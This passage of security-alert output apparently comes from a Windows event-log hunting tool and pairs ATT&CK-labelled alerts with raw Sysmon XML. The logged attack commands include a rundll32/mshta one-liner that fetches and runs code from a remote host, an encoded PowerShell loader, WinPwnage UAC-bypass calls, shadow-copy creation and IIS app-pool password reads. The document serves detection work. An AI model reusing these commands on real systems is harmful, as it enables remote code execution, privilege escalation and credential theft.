GUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16389 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.275 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6180 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.402 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6180 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.402 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4128 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:39.888 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49703 + + false + 108.179.232.58 + gator4243.hostgator.com + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10153 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 22:49:09.276 + 365ABB72-D0E5-5CC8-0000-0010DADF3E00 + 2892 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-C494-5CC8-0000-0020E4FF0000 + 0xffe4 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-D0E4-5CC8-0000-00103CB73E00 + 3680 + C:\Windows\Installer\MSI4FFD.tmp + "C:\Windows\Installer\MSI4FFD.tmp" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5934 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.702 + 365ABB72-3D6E-5CEB-0000-0010AFA2FF00 + 3812 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\System32\cmd.exe") in directory : ( C:\Users\bouss\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10920364 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-10-21 16:27:02.278 + 00247C92-94D6-6171-0000-00100514967B + 28176 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript.exe + cscript.exe //e:jscript testme.js + C:\Users\bouss\Desktop\ + LAPTOP-JU4M3I0E\bouss + 00247C92-3C1A-6169-0000-0020C2790700 + 0x779c2 + 1 + Medium + SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 00247C92-85C9-6170-0000-001008E62B6B + 24148 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5931 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.622 + 365ABB72-3D6E-5CEB-0000-0010EF9EFF00 + 3756 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 